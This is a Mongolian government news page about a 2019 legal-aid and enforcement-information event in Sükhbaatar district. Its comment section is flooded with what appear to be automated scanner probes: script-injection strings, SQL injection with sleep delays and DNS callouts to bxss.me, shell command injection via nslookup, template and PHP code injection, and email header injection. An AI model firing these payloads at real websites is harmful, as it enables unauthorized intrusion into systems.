ШҮҮХИЙН ШИЙДВЭР ГҮЙЦЭТГЭХ ЕРӨНХИЙ ГАЗАР

ШИЙДВЭР ГҮЙЦЭТГЭХ АЛБА

ИРГЭДЭД ШИЙДВЭР ГҮЙЦЭТГЭХ АЖИЛЛАГААНЫ МЭДЭЭЛЭЛ, ХУУЛЬ ЗҮЙН ТУСЛАЛЦАА ҮЗҮҮЛЭХ АЖЛЫГ ЗОХИОН БАЙГУУЛЛАА.
Нийтлэгдсэн 2019-08-23 13:34:20 | Үзсэн: 1

            Шийдвэр гүйцэтгэх ажиллагааны чиглэлээр иргэдэд хууль зүйн туслалцаа үзүүлэх, шүүхийн шийдвэрээр тогтоогдсон төлбөртэй эсэх талаарх лавлагаа, мэдээлийг олгох ажлыг Нийслэлийн Сүхбаатар дүүргийн Засаг даргын тамгын газартай хамтран зохион байгуулж, Шийдвэр гүйцэтгэх албаны алба хаагчдаас тус дүүргийн “Нэг цэгийн үйлчилгээний” танхимаар мэдээлэл, лавлагаа олгох ажлыг зохион байгуулав.

2019-08-23 13:34:20
Сэтгэгдэл бичих

Нэр :
Таны и-мэйл :
Сэтгэгдэл :
Энд дарж зурган кодыг шинэчилнэ үү
Нийт сэтгэгдэл
magkdbkg :
20
2019-08-23 13:34:20
magkdbkg :
20
2019-08-23 13:34:20
magkdbkg :
20
2019-08-23 13:34:20
magkdbkg :
20
2019-08-23 13:34:20
magkdbkg :
20VLYP1[!+!]
2019-08-23 13:34:20
magkdbkg :
20H4GCJ ymwz(9765)
2019-08-23 13:34:20
magkdbkg :
20
2019-08-23 13:34:20
magkdbkg :
20}body{acu:Expre/**/SSion(ymwz(9253))}
2019-08-23 13:34:20
magkdbkg :
20
2019-08-23 13:34:20
magkdbkg :
[url=http://www.vulnweb.com][/url]
2019-08-23 13:34:20
magkdbkg :
2019-08-23 13:34:20
magkdbkg :
2019-08-23 13:34:20
magkdbkg :
20
2019-08-23 13:34:20
magkdbkg :
2019-08-23 13:34:20
magkdbkg :
20<ScRiPt>ymwz(9769)</sCripT>
2019-08-23 13:34:20
magkdbkg :
20\u003CScRiPt\ymwz(9340)\u003C/sCripT\u003E
2019-08-23 13:34:20
magkdbkg :
%32%30%3C%53%63%52%69%50%74%20%3E%79%6D%77%7A%289159%29%3C%2F%73%43%72%69%70%54%3E
2019-08-23 13:34:20
magkdbkg :
20
2019-08-23 13:34:20
magkdbkg :
20
2019-08-23 13:34:20
magkdbkg :
20
2019-08-23 13:34:20
magkdbkg :
20
2019-08-23 13:34:20
magkdbkg :
20
2019-08-23 13:34:20
magkdbkg :
20
2019-08-23 13:34:20
magkdbkg :
20
2019-08-23 13:34:20
magkdbkg :
20
2019-08-23 13:34:20
magkdbkg :
20ymwz(9941)
2019-08-23 13:34:20
magkdbkg :
20ymwz(9211)
2019-08-23 13:34:20
magkdbkg :
20ymwz(9010)
2019-08-23 13:34:20
magkdbkg :
20DNBAL[!+!]
2019-08-23 13:34:20
magkdbkg :
20ymwz(9459)
2019-08-23 13:34:20
magkdbkg :
{{10000184*9999321}}
2019-08-23 13:34:20
magkdbkg :
CWS000x=1N@E߮I)@ HiP"DFG&َ7܂rX;!S̛7Jq.>pclzGܾMdkj,(TJj)"T7$HD6)x)ؒ\C|QNcb b_&5 hg ]s0QL
2019-08-23 13:34:20
magkdbkg :
acux8201z1z2abcxuca8201
2019-08-23 13:34:20
magkdbkg :
acu5817<s1﹥s2ʺs3ʹuca5817
2019-08-23 13:34:20
magkdbkg :
209123211
2019-08-23 13:34:20
magkdbkg :
'"()&%ymwz(9540)
2019-08-23 13:34:20
magkdbkg :
20'"()&%ymwz(9625)
2019-08-23 13:34:20
fpgpvohm :
1acuK6bQ4i9Uqp
2019-08-23 13:34:20
sgehlorh :
20
2019-08-23 13:34:20
sgehlorh :
20
2019-08-23 13:34:20
sgehlorh :
20
2019-08-23 13:34:20
sgehlorh :
20
2019-08-23 13:34:20
sgehlorh :
20UQXWZ[!+!]
2019-08-23 13:34:20
sgehlorh :
20y0ppI ykwk(9211)
2019-08-23 13:34:20
sgehlorh :
20
2019-08-23 13:34:20
sgehlorh :
20}body{acu:Expre/**/SSion(ykwk(9516))}
2019-08-23 13:34:20
sgehlorh :
20
2019-08-23 13:34:20
sgehlorh :
[url=http://www.vulnweb.com][/url]
2019-08-23 13:34:20
sgehlorh :
2019-08-23 13:34:20
sgehlorh :
2019-08-23 13:34:20
sgehlorh :
20
2019-08-23 13:34:20
sgehlorh :
2019-08-23 13:34:20
sgehlorh :
20<ScRiPt>ykwk(9839)</sCripT>
2019-08-23 13:34:20
sgehlorh :
20\u003CScRiPt\ykwk(9639)\u003C/sCripT\u003E
2019-08-23 13:34:20
sgehlorh :
%32%30%3C%53%63%52%69%50%74%20%3E%79%6B%77%6B%289847%29%3C%2F%73%43%72%69%70%54%3E
2019-08-23 13:34:20
sgehlorh :
20
2019-08-23 13:34:20
sgehlorh :
20
2019-08-23 13:34:20
sgehlorh :
20
2019-08-23 13:34:20
sgehlorh :
20
2019-08-23 13:34:20
sgehlorh :
20
2019-08-23 13:34:20
sgehlorh :
20
2019-08-23 13:34:20
sgehlorh :
20
2019-08-23 13:34:20
sgehlorh :
20
2019-08-23 13:34:20
sgehlorh :
20ykwk(9033)
2019-08-23 13:34:20
sgehlorh :
20ykwk(9023)
2019-08-23 13:34:20
ulpjsykb :
390'
2019-08-23 13:34:20
ulpjsykb :
20';copy (select '') to program 'nslookup dns.sqli.\013405.85-666.85.8b691.\1.bxss.me
2019-08-23 13:34:20
sgehlorh :
20ykwk(9546)
2019-08-23 13:34:20
sgehlorh :
20O3BSO[!+!]
2019-08-23 13:34:20
sgehlorh :
20ykwk(9817)
2019-08-23 13:34:20
sgehlorh :
{{9999044*9999282}}
2019-08-23 13:34:20
sgehlorh :
CWS000x=1N@E߮I)@ HiP"DFG&َ7܂rX;!S̛7Jq.>pclzGܾMdkj,(TJj)"T7$HD6)x)ؒ\C|QNcb b_&5 hg ]s0QL
2019-08-23 13:34:20
sgehlorh :
acux9366z1z2abcxuca9366
2019-08-23 13:34:20
aivwxqga :
''""
2019-08-23 13:34:20
aivwxqga :
JyI=
2019-08-23 13:34:20
sgehlorh :
acu10501<s1﹥s2ʺs3ʹuca10501
2019-08-23 13:34:20
ulpjsykb :
20;copy (select '') to program 'nslookup dns.sqli.\013405.85-665.85.8b691.\1.bxss.me'
2019-08-23 13:34:20
aivwxqga :
@@kzV6X
2019-08-23 13:34:20
ulpjsykb :
20||UTL_INADDR.get_host_address('dns.'||'sqli.013405.85-663.85.8b691.1.bxss'||'.me')
2019-08-23 13:34:20
ulpjsykb :
'||UTL_INADDR.get_host_address('dns.'||'sqli.013405.85-664.85.8b691.1.bxss'||'.me')||'
2019-08-23 13:34:20
ulpjsykb :
gOmGlABU');select pg_sleep(6); --
2019-08-23 13:34:20
ulpjsykb :
9tofhm6T'));select pg_sleep(9); --
2019-08-23 13:34:20
sgehlorh :
209419694
2019-08-23 13:34:20
ulpjsykb :
Bt4bJ6Si';select pg_sleep(6); --
2019-08-23 13:34:20
ulpjsykb :
-1));select pg_sleep(6); --
2019-08-23 13:34:20
ulpjsykb :
-1;select pg_sleep(6); --
2019-08-23 13:34:20
ulpjsykb :
-1);select pg_sleep(6); --
2019-08-23 13:34:20
ulpjsykb :
3xXWRZXw'; waitfor delay '0:0:6' --
2019-08-23 13:34:20
sgehlorh :
'"()&%ykwk(9657)
2019-08-23 13:34:20
ulpjsykb :
-1); waitfor delay '0:0:3' --
2019-08-23 13:34:20
ulpjsykb :
1 waitfor delay '0:0:3' --
2019-08-23 13:34:20
sgehlorh :
20'"()&%ykwk(9046)
2019-08-23 13:34:20
ulpjsykb :
-1; waitfor delay '0:0:3' --
2019-08-23 13:34:20
ulpjsykb :
if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/
2019-08-23 13:34:20
ulpjsykb :
(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/
2019-08-23 13:34:20
ulpjsykb :
-1 OR 3+925-925-1=0+0+0+1
2019-08-23 13:34:20
ulpjsykb :
-1 OR 3+594-594-1=0+0+0+1 --
2019-08-23 13:34:20
ulpjsykb :
-1 OR 2+925-925-1=0+0+0+1
2019-08-23 13:34:20
ulpjsykb :
-1 OR 2+594-594-1=0+0+0+1 --
2019-08-23 13:34:20
ulpjsykb :
1*1*1*20
2019-08-23 13:34:20
ulpjsykb :
1*1*1*20
2019-08-23 13:34:20
ulpjsykb :
1*1*1*20
2019-08-23 13:34:20
ulpjsykb :
1*1*1*20
2019-08-23 13:34:20
ulpjsykb :
Z9cldAJb
2019-08-23 13:34:20
rkwwsjoq :
2019-08-23 13:34:20
spdcftkq :
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
2019-08-23 13:34:20
ijarprop :
/www.vulnweb.com
2019-08-23 13:34:20
xnqvnofu :
news/.
2019-08-23 13:34:20
xnqvnofu :
news
2019-08-23 13:34:20
miwwchhi :
http://hit4n34gWNgt4.bxss.me/
2019-08-23 13:34:20
ostkbbbc :
${@print(md5(acunetix_wvs_security_test))}\
2019-08-23 13:34:20
ostkbbbc :
${@print(md5(acunetix_wvs_security_test))}
2019-08-23 13:34:20
ostkbbbc :
";print(md5(acunetix_wvs_security_test));$a="
2019-08-23 13:34:20
ostkbbbc :
';print(md5(acunetix_wvs_security_test));$a='
2019-08-23 13:34:20
ostkbbbc :
;print(md5(acunetix_wvs_security_test));
2019-08-23 13:34:20
jffpdclf :
http://testasp.vulnweb.com/t/xss.html?%00.jpg
2019-08-23 13:34:20
jymlbtpd :
testasp.vulnweb.com
2019-08-23 13:34:20
jymlbtpd :
http://testasp.vulnweb.com/t/fit.txt?.jpg
2019-08-23 13:34:20
jymlbtpd :
Http://testasp.vulnweb.com/t/fit.txt
2019-08-23 13:34:20
bihowdxk :
'"()
2019-08-23 13:34:20
jymlbtpd :
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
2019-08-23 13:34:20
lpbtvnck :
^(#$!@#$)(()))******
2019-08-23 13:34:20
lpbtvnck :
!(()&&!|*|*|
2019-08-23 13:34:20
vtxebtco :
20&n997960=v980100
2019-08-23 13:34:20
rjlpsfau :
${9999747+9999339}
2019-08-23 13:34:20
giyyvyyx :
20 bcc:013405.85-633.85.8b691.1@bxss.me
2019-08-23 13:34:20
giyyvyyx :
to@example.com> bcc:013405.85-634.85.8b691.1@bxss.me
2019-08-23 13:34:20
lfvygepb :
6VH4DBNx
2019-08-23 13:34:20
vylipkoj :
&nslookup dns.ce.\013405.85-623.85.8b691.\1.bxss.me&'\"`0&nslookup dns.ce.\013405.85-623.85.8b691.\1.bxss.me&`'
2019-08-23 13:34:20
vylipkoj :
$(nslookup dns.ce.\013405.85-621.85.8b691.\1.bxss.me)
2019-08-23 13:34:20
vylipkoj :
set|set&set
2019-08-23 13:34:20
cteokpde :
20'>">
2019-08-23 13:34:20
cteokpde :
20
2019-08-23 13:34:20
vrepcdmd :
"+response.write(9748090*9045067)+"
2019-08-23 13:34:20
vrepcdmd :
'+response.write(9748090*9045067)+'
2019-08-23 13:34:20
vrepcdmd :
response.write(9748090*9045067)
2019-08-23 13:34:20
Нийслэлийн шийдвэр гүйцэтгэх газар
 • Утас :
  70001480
 • Факс :
  70001482
 • Имэйл :
  shgg@cd.gov.mn
 • Манай хаяг :

  Улаанбаатар хот, Сүхбаатар дүүрэг, 10-р хороо, Цагдаагийн гудамж ШШГЕГ-ын хоёрдугаар байр